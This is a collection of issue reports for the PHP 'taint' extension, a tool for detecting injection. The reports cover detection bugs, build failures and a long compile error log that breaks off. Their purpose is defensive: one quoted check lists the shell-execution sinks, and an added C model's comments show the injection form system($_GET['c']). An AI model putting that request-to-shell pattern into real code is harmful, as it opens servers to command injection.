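The chaining this issue asks for, as an added example that models the engine's hook table in plain C; it is not code from taint, Xdebug or php-src. model_get_handler and model_set_handler stand in for zend_get_user_opcode_handler and zend_set_user_opcode_handler, and every model_* name and the opcode number are assumptions.

```c
#include <stddef.h>
#include <stdio.h>

/* Model only: stand-ins for the engine's user-opcode hook table. */
#define MODEL_ZEND_CONCAT 8   /* opcode number chosen for the model */
#define MODEL_DISPATCH    2   /* plays the role of ZEND_USER_OPCODE_DISPATCH */

typedef struct {
    int taint_seen;   /* times the taint handler ran */
    int other_seen;   /* times the other extension's handler ran */
    int result;       /* value handed back to the VM */
} model_run;

typedef int (*model_handler_t)(model_run *run);

static model_handler_t hook_table[256];   /* one slot per opcode */

static model_handler_t model_get_handler(unsigned char op) { return hook_table[op]; }
static void model_set_handler(unsigned char op, model_handler_t h) { hook_table[op] = h; }

/* Handler of an extension that was loaded before taint (hypothetical). */
static int other_ext_handler(model_run *run) {
    run->other_seen++;
    return MODEL_DISPATCH;
}

/* Behaviour described in the issue: the earlier handler is never called. */
static int taint_handler_unchained(model_run *run) {
    run->taint_seen++;
    return MODEL_DISPATCH;
}

/* Requested behaviour: remember the earlier handler and hand over to it. */
static model_handler_t taint_prev_handler;

static int taint_handler_chained(model_run *run) {
    run->taint_seen++;
    if (taint_prev_handler != NULL) {
        return taint_prev_handler(run);
    }
    return MODEL_DISPATCH;
}

static void taint_register(int chained) {
    if (!chained) {
        model_set_handler(MODEL_ZEND_CONCAT, taint_handler_unchained);
        return;
    }
    model_handler_t prev = model_get_handler(MODEL_ZEND_CONCAT);
    /* Registering twice must not make the handler call itself. */
    if (prev != taint_handler_chained) {
        taint_prev_handler = prev;
    }
    model_set_handler(MODEL_ZEND_CONCAT, taint_handler_chained);
}

/* One VM step: run the user handler if a slot is filled. */
static int model_execute(unsigned char op, model_run *run) {
    model_handler_t h = model_get_handler(op);
    return h != NULL ? h(run) : MODEL_DISPATCH;
}

/* Load order: the other extension first (optional), then taint. */
static model_run run_scenario(int other_loaded, int chained) {
    model_run run = {0, 0, 0};
    hook_table[MODEL_ZEND_CONCAT] = NULL;
    taint_prev_handler = NULL;
    if (other_loaded) {
        model_set_handler(MODEL_ZEND_CONCAT, other_ext_handler);
    }
    taint_register(chained);
    run.result = model_execute(MODEL_ZEND_CONCAT, &run);
    return run;
}

int main(void) {
    model_run a = run_scenario(1, 0);
    model_run b = run_scenario(1, 1);
    printf("unchained: taint=%d other=%d\n", a.taint_seen, a.other_seen);
    printf("chained:   taint=%d other=%d\n", b.taint_seen, b.other_seen);
    return 0;
}
```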

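taint's detection for PDO does not work

The detection for PDO in taint does not work. I found that the cause is that the PDO class name in PHP is the uppercase PDO, while the class check uses the lowercase pdo, so the check has no effect. In addition, mysqli lacks a check for prepare statements; in most cases this is not a problem, but if individual parameters are still embedded in the statement, the problem remains. I hope this can be fixed in the next version, thanks!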

String slashes bug

Hi,
I've only just started playing with this extension and I'm not familiar enough with how it works yet to properly triage this so apologies for being kind of vague!

I have enabled the extension on PHP 7 on Ubuntu 14.10 with 'pecl install taint-beta'.

When it's enabled, it seems to be doing something strange to strings containing slashes. For example if I run Wordpress, I get errors such as the following:

[Fri Jan 29 13:00:54.852696 2016] [:error] [pid 20226] [client :3850] PHP Warning: require(var/www/html/wp/wp-content/plugins/bbpress/includes/core/sub-actions.php)

There should be a leading '/' on this path, but it has disappeared. Also, sometimes I get redirected to paths which should contain slashes and don't, for example it will sometimes redirect me to '/wp-adminsomepage' instead of 'wp-admin/somepage'.

However, if I disable taint in php.ini, these problems immediately disappear and everything is fine.

Does this ring any bells for anyone more familiar with the codebase as to anything taint may be doing to cause this?

The sensitive parameters of some sinks are incorrect

ex:

else if (zend_string_equals_literal(fname, "passthru") ||
				zend_string_equals_literal(fname, "system") ||
				zend_string_equals_literal(fname, "exec") ||
				zend_string_equals_literal(fname, "shell_exec") ||
				zend_string_equals_literal(fname, "proc_open") ||
				zend_string_equals_literal(fname, "popen")) {
			zval *cmd = ZEND_CALL_ARG(ex, arg_count);
			if (IS_STRING == Z_TYPE_P(cmd) && TAINT_POSSIBLE(Z_STR_P(cmd))) {
				php_taint_error(ZSTR_VAL(fname), "CMD statement contains data that might be tainted");
			}
		}

The param of the cmd string is the last param in these function calls, but the system declaration is:

system ( string $command [, int &$return_var ] ) : string

So if I set the 2nd param of system, taint will ignore the first param, which is actually the cmd string.
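
The effect described in the issue above, shown as an added example rather than code from the extension: a constructed C model of a call frame that compares the quoted last-argument check with a check of parameter 1, where the command string sits in all six listed functions. The `model_*` types, the helper names and the sample calls are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of a call frame: just enough to show which argument the
 * sink check inspects. These are not the extension's data structures. */
typedef struct {
    int is_string; /* argument holds a string */
    int tainted;   /* string carries the "possibly tainted" mark */
} model_arg;

typedef struct {
    const char *fname;
    int arg_count;
    model_arg args[3];
} model_call;

/* 1-based access, like ZEND_CALL_ARG(ex, n) in the quoted code. */
static const model_arg *call_arg(const model_call *c, int n) {
    return &c->args[n - 1];
}

static int is_cmd_sink(const char *fname) {
    static const char *const sinks[] = {
        "passthru", "system", "exec", "shell_exec", "proc_open", "popen"
    };
    size_t i;
    for (i = 0; i < sizeof sinks / sizeof sinks[0]; i++) {
        if (strcmp(fname, sinks[i]) == 0) return 1;
    }
    return 0;
}

/* Returns 1 when a warning would be raised for the argument at `position`. */
static int warn_if_tainted(const model_call *c, int position) {
    const model_arg *cmd;
    if (!is_cmd_sink(c->fname) || position < 1 || position > c->arg_count) {
        return 0;
    }
    cmd = call_arg(c, position);
    return cmd->is_string && cmd->tainted;
}

/* As quoted in the issue: inspect the LAST argument that was passed. */
static int check_last_arg(const model_call *c) {
    return warn_if_tainted(c, c->arg_count);
}

/* Inspect parameter 1, which is the command for every function listed. */
static int check_first_arg(const model_call *c) {
    return warn_if_tainted(c, 1);
}

/* Constructed sample calls; the comment shows the PHP call each one models. */
static const model_call sample_calls[] = {
    /* system($_GET['c'])         */ { "system", 1, { {1, 1} } },
    /* system($_GET['c'], $ret)   */ { "system", 2, { {1, 1}, {0, 0} } },
    /* popen($_GET['c'], "r")     */ { "popen",  2, { {1, 1}, {1, 0} } },
    /* exec("uptime", $out, $rc)  */ { "exec",   3, { {1, 0}, {0, 0}, {0, 0} } },
    /* popen("ls", $_GET['mode']) */ { "popen",  2, { {1, 0}, {1, 1} } },
};
#define N_SAMPLES (sizeof sample_calls / sizeof sample_calls[0])

/* Tainted commands that the last-argument check lets through silently. */
static int count_missed(void) {
    size_t i;
    int n = 0;
    for (i = 0; i < N_SAMPLES; i++) {
        if (check_first_arg(&sample_calls[i]) && !check_last_arg(&sample_calls[i])) n++;
    }
    return n;
}

/* Warnings raised about an argument that is not the command at all. */
static int count_wrong_param(void) {
    size_t i;
    int n = 0;
    for (i = 0; i < N_SAMPLES; i++) {
        if (check_last_arg(&sample_calls[i]) && !check_first_arg(&sample_calls[i])) n++;
    }
    return n;
}

int main(void) {
    size_t i;
    for (i = 0; i < N_SAMPLES; i++) {
        printf("%-6s argc=%d  last-arg check: %d  first-arg check: %d\n",
               sample_calls[i].fname, sample_calls[i].arg_count,
               check_last_arg(&sample_calls[i]), check_first_arg(&sample_calls[i]));
    }
    printf("missed tainted commands: %d, warnings on the wrong parameter: %d\n",
           count_missed(), count_wrong_param());
    return 0;
}
```
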

Windows PHP-SDK PECL Build Error: Could not find rc file because of credit string that contain "<" & ">"

Abstract (English)

The credit string has an email string surrounded by "<" and ">". When nmake executes the Microsoft Windows Resource Compiler (rc), these break the command and rc returns 0x1, saying "The System Could Not Find The File Specified". The whole compile process fails and nmake outputs "fatal error U1077".

Not sure whether the bug should be assigned to PHP-SDK or taint extension.


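Problem details (originally in Chinese)

The Credit section of taint contains the "<" and ">" characters. When building the PECL extension by following the official PHP-SDK and tutorial (https://wiki.php.net/internals/windows/stepbystepbuild ), the command line gets truncated once nmake reaches the Microsoft Windows Resource Compiler (rc) stage, so rc returns 0x1 and reports "系统找不到指定的文件。" ("The system cannot find the file specified."). The whole build fails and nmake reports "fatal error U1077".

I am not sure whether this bug belongs to PHP-SDK or whether the Credit attribute of the taint extension is written incorrectly.

Build environment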

Windows XP SP3 x86
Windows SDK 6.1
Visual C++ Express 2008 SP1

What is being compiled

PHP 5.3.29 NTS VC9 x86
PHP Taint 1.2.2 For PHP 5.3.29 NTS VC9 x86 (https://pecl.php.net/package/taint)

Steps to reproduce

1. Build the PECL extension by following "Adding PECL extensions" in the official PHP-SDK tutorial (https://wiki.php.net/internals/windows/stepbystepbuild ), but replace the configure command line with:

configure --disable-all --enable-cli --enable-cgi --enable-taint=shared

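2. Run nmake

Expected result

The build succeeds

Actual result

rc returns 0x1 and reports "系统找不到指定的文件。" ("The system cannot find the file specified."). The whole build fails and nmake reports "fatal error U1077".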

   正在创建库 Release\php5.lib 和对象 Release\php5.exp
        rc /n /fo Release\php_taint.dll.res /d FILE_DESCRIPTION="\"taint\"" /d F
ILE_NAME="\"php_taint.dll\"" /d URL="\"http://pecl.php.net/taint\"" /d INTERNAL_
NAME="\"TAINT extension\"" /d EXT_FILE_VERSION=1,2,2 /d EXT_VERSION="\"1.2.2\""
/d THANKS_GUYS="\"Thanks to Xinchen Hui <[email protected]>\"" win32\build\templa
te.rc
系统找不到指定的文件。
NMAKE : fatal error U1077: “rc”: 返回代码“0x1”
Stop.

Current mitigation/workaround

After configure finishes, edit Makefile and Makefile.objects and replace the "<" and ">" inside THANKS_GUYS= with "(" and ")" respectively.

taint.c

In the two functions php_assign_handler() and php_assign_ref_handler(), TAINT_CV_DEF_OF(TAINT_OP1_VAR(opline)) appears where OP2 is handled. [LINE 1932, LINE2009]
It should be TAINT_CV_DEF_OF(TAINT_OP2_VAR(opline)).

Does this support backward taint analysis?

I am always looking for a debugger that supports system-wide taint analysis, but I only found free tools like panda. Unfortunately, its performance is too bad. When I run some large software in the VM, the whole system is very slow and I can't debug it at all. Finally I found a commercial tool called tetrane. But I asked some people, and they said that this tool is not as high-performance as advertised. I don't know if there is a debugger on the market that supports full-system taint analysis and doesn't slow the system down when you run Firefox. In addition, I am looking for an open source project implemented in C or C++ that supports forward and backward taint analysis. I found an open source IDA plugin called bincat, but it's not in C; I studied it for a few days, got a headache, and couldn't understand it. If you have any information, please let me know, thank you.

Installation error on php7.0.5

pecl/taint requires PHP (version >= 5.2.0, version <= 5.4.99), installed version is 7.0.5

make error at php5.5.9 ubuntu 14.04LTS

Error message:
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:60:3: error: #error "Unsupported PHP Version ID:" PHP_VERSION_ID
# error "Unsupported PHP Version ID:" PHP_VERSION_ID
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_make_real_object':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:116:36: error: 'IS_FALSE' undeclared (first use in this function)
if (EXPECTED(Z_TYPE_P(object) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'
# define EXPECTED(condition) __builtin_expect(condition, 1)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:116:36: note: each undeclared identifier is reported only once for each function it appears in
if (EXPECTED(Z_TYPE_P(object) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'
# define EXPECTED(condition) __builtin_expect(condition, 1)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:130:1: error: unknown type name 'zend_long'
static zend_long php_taint_check_string_offset(zval *dim, int type) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_check_string_offset':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:131:2: error: unknown type name 'zend_long'
zend_long offset;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:146:9: error: 'IS_FALSE' undeclared (first use in this function)
case IS_FALSE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:147:9: error: 'IS_TRUE' undeclared (first use in this function)
case IS_TRUE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:150:9: error: 'IS_REFERENCE' undeclared (first use in this function)
case IS_REFERENCE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:151:9: warning: assignment makes pointer from integer without a cast [enabled by default]
dim = Z_REFVAL_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fetch_dimension_address_inner':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:169:2: error: unknown type name 'zend_string'
zend_string *offset_key;
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:176:3: error: too few arguments to function 'zend_hash_index_find'
retval = zend_hash_index_find(ht, hval);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:166:14: note: declared here
ZEND_API int zend_hash_index_find(const HashTable *ht, ulong h, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:180:47: error: expected ')' before 'ZEND_LONG_FMT'
zend_error(E_NOTICE,"Undefined offset: " ZEND_LONG_FMT, hval);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:187:47: error: expected ')' before 'ZEND_LONG_FMT'
zend_error(E_NOTICE,"Undefined offset: " ZEND_LONG_FMT, hval);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:190:13: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = zend_hash_index_add_new(ht, hval, &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:195:14: warning: assignment makes pointer from integer without a cast [enabled by default]
offset_key = Z_STR_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:197:44: error: macro "ZEND_HANDLE_NUMERIC" requires 3 arguments, but only 2 given
if (ZEND_HANDLE_NUMERIC(offset_key, hval)) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:197:8: error: 'ZEND_HANDLE_NUMERIC' undeclared (first use in this function)
if (ZEND_HANDLE_NUMERIC(offset_key, hval)) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:202:3: warning: passing argument 2 of 'zend_hash_find' from incompatible pointer type [enabled by default]
retval = zend_hash_find(ht, offset_key);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:164:14: note: expected 'const char *' but argument is of type 'int *'
ZEND_API int zend_hash_find(const HashTable *ht, const char *arKey, uint nKeyLength, void **pData);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:202:3: error: too few arguments to function 'zend_hash_find'
retval = zend_hash_find(ht, offset_key);
^
In file included from /usr/include/php5/Zend/zend.h:286:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_hash.h:164:14: note: declared here
ZEND_API int zend_hash_find(const HashTable *ht, const char *arKey, uint nKeyLength, void **pData);
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:205:39: error: 'IS_INDIRECT' undeclared (first use in this function)
if (UNEXPECTED(Z_TYPE_P(retval) == IS_INDIRECT)) {
^
/usr/include/php5/Zend/zend.h:390:49: note: in definition of macro 'UNEXPECTED'
# define UNEXPECTED(condition) __builtin_expect(condition, 0)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:206:12: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = Z_INDIRECT_P(retval);
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:207:40: error: 'IS_UNDEF' undeclared (first use in this function)
if (UNEXPECTED(Z_TYPE_P(retval) == IS_UNDEF)) {
^
/usr/include/php5/Zend/zend.h:390:49: note: in definition of macro 'UNEXPECTED'
# define UNEXPECTED(condition) __builtin_expect(condition, 0)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:210:8: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:217:8: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE,"Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:228:6: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:235:6: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE,"Undefined index: %s", ZSTR_VAL(offset_key));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:238:13: warning: assignment makes pointer from integer without a cast [enabled by default]
retval = zend_hash_add_new(ht, offset_key, &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:245:16: warning: assignment makes pointer from integer without a cast [enabled by default]
offset_key = ZSTR_EMPTY_ALLOC();
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:251:5: warning: format '%p' expects argument of type 'void *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Resource ID#%pd used as offset, casting to integer (%pd)", Z_RES_HANDLE_P(dim), Z_RES_HANDLE_P(dim));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:251:5: warning: format '%p' expects argument of type 'void *', but argument 4 has type 'int' [-Wformat=]
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:254:9: error: 'IS_FALSE' undeclared (first use in this function)
case IS_FALSE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:257:9: error: 'IS_TRUE' undeclared (first use in this function)
case IS_TRUE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:260:9: error: 'IS_REFERENCE' undeclared (first use in this function)
case IS_REFERENCE:
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:261:9: warning: assignment makes pointer from integer without a cast [enabled by default]
dim = Z_REFVAL_P(dim);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_fetch_dimension_address':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:286:87: error: macro "zend_hash_next_index_insert" requires 4 arguments, but only 2 given
retval = zend_hash_next_index_insert(Z_ARRVAL_P(container), &EG(uninitialized_zval));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:286:13: error: 'zend_hash_next_index_insert' undeclared (first use in this function)
retval = zend_hash_next_index_insert(Z_ARRVAL_P(container), &EG(uninitialized_zval));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:301:45: error: 'IS_REFERENCE' undeclared (first use in this function)
} else if (EXPECTED(Z_TYPE_P(container) == IS_REFERENCE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'
# define EXPECTED(condition) __builtin_expect(condition, 1)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:302:13: warning: assignment makes pointer from integer without a cast [enabled by default]
container = Z_REFVAL_P(container);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:340:4: error: too many arguments to function 'container->value.obj.handlers->read_dimension'
retval = Z_OBJ_HT_P(container)->read_dimension(container, dim, type, result);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:346:5: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Indirect modification of overloaded element of %s has no effect", ZSTR_VAL(ce->name));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:347:54: error: 'IS_UNDEF' undeclared (first use in this function)
} else if (EXPECTED(retval && Z_TYPE_P(retval) != IS_UNDEF)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'
# define EXPECTED(condition) __builtin_expect(condition, 1)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:362:7: warning: format '%s' expects argument of type 'char *', but argument 3 has type 'int' [-Wformat=]
zend_error(E_NOTICE, "Indirect modification of overloaded element of %s has no effect", ZSTR_VAL(ce->name));
^
In file included from /usr/include/php5/main/php.h:35:0,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:378:45: error: 'IS_FALSE' undeclared (first use in this function)
} else if (EXPECTED(Z_TYPE_P(container) <= IS_FALSE)) {
^
/usr/include/php5/Zend/zend.h:389:49: note: in definition of macro 'EXPECTED'
# define EXPECTED(condition) __builtin_expect(condition, 1)
                                             ^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_assign_op_overloaded_property':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: warning: passing argument 4 of 'obj.value.obj.handlers->read_property' from incompatible pointer type [enabled by default]
(z = Z_OBJ_HT(obj)->read_property(&obj, property, BP_VAR_R, cache_slot, &rv)) != NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: note: expected 'const struct _zend_literal *' but argument is of type 'void **'
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:416:3: error: too many arguments to function 'obj.value.obj.handlers->read_property'
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:423:4: error: too many arguments to function 'z->value.obj.handlers->get'
zval *value = Z_OBJ_HT_P(z)->get(z, &rv2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:426:5: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:439:3: warning: passing argument 4 of 'obj.value.obj.handlers->write_property' from incompatible pointer type [enabled by default]
Z_OBJ_HT(obj)->write_property(&obj, property, z, cache_slot);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:439:3: note: expected 'const struct _zend_literal *' but argument is of type 'void **'
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:444:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR_P(z));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:446:3: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(zptr);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_binary_assign_op_obj_dim':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:463:3: error: too many arguments to function 'object->value.obj.handlers->read_dimension'
(z = Z_OBJ_HT_P(object)->read_dimension(object, property, BP_VAR_R, &rv)) != NULL) {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:467:4: error: too many arguments to function 'z->value.obj.handlers->get'
zval *value = Z_OBJ_HT_P(z)->get(z, &rv2);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:470:5: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:475:20: error: 'IS_REFERENCE' undeclared (first use in this function)
(Z_TYPE_P(z) == IS_REFERENCE && IS_STRING == Z_TYPE_P(Z_REFVAL_P(z)) &&
^
In file included from /usr/include/php5/Zend/zend.h:840:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_operators.h:486:33: error: invalid type argument of unary '*' (have 'int')
#define Z_TYPE_P(zval_p) Z_TYPE(*zval_p)
^
/usr/include/php5/Zend/zend_operators.h:485:24: note: in definition of macro 'Z_TYPE'
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:475:49: note: in expansion of macro 'Z_TYPE_P'
(Z_TYPE_P(z) == IS_REFERENCE && IS_STRING == Z_TYPE_P(Z_REFVAL_P(z)) &&
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:482:48: warning: pointer/integer type mismatch in conditional expression [enabled by default]
binary_op(&res, Z_ISREF_P(z) ? Z_REFVAL_P(z) : z, value);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:485:4: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&rv);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
In file included from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:30:0:
/home/ubuntu/Desktop/taint-taint-2.0.2/php_taint.h:42:43: error: lvalue required as left operand of assignment
#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:491:4: note: in expansion of macro 'TAINT_MARK'
TAINT_MARK(Z_STR(res));
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:493:3: warning: passing argument 1 of '_zval_ptr_dtor' from incompatible pointer type [enabled by default]
zval_ptr_dtor(&res);
^
In file included from /usr/include/php5/Zend/zend.h:841:0,
from /usr/include/php5/main/php.h:35,
from /home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:23:
/usr/include/php5/Zend/zend_variables.h:51:15: note: expected 'struct zval **' but argument is of type 'struct zval *'
ZEND_API void _zval_ptr_dtor(zval **zval_ptr ZEND_FILE_LINE_DC);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:504:36: error: unknown type name 'zend_array'
static void php_taint_mark_strings(zend_array *symbol_table) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:516:77: error: unknown type name 'uint32_t'
static zval *php_taint_get_zval_ptr_tmpvar(zend_execute_data *execute_data, uint32_t var, zend_free_op *should_free) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:532:73: error: unknown type name 'uint32_t'
static zval *php_taint_get_zval_ptr_cv(zend_execute_data *execute_data, uint32_t var, int type, int force_ret) /* {{{ */ {
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: In function 'php_taint_get_zval_ptr':
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:562:3: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_tmpvar(execute_data, op.var, should_free);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:566:4: warning: return makes pointer from integer without a cast [enabled by default]
return EX_CONSTANT(op);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:568:4: warning: return makes pointer from integer without a cast [enabled by default]
return php_taint_get_zval_ptr_cv(execute_data, op.var, type, force_ret);
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c: At top level:
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:576:78: error: unknown type name 'uint32_t'
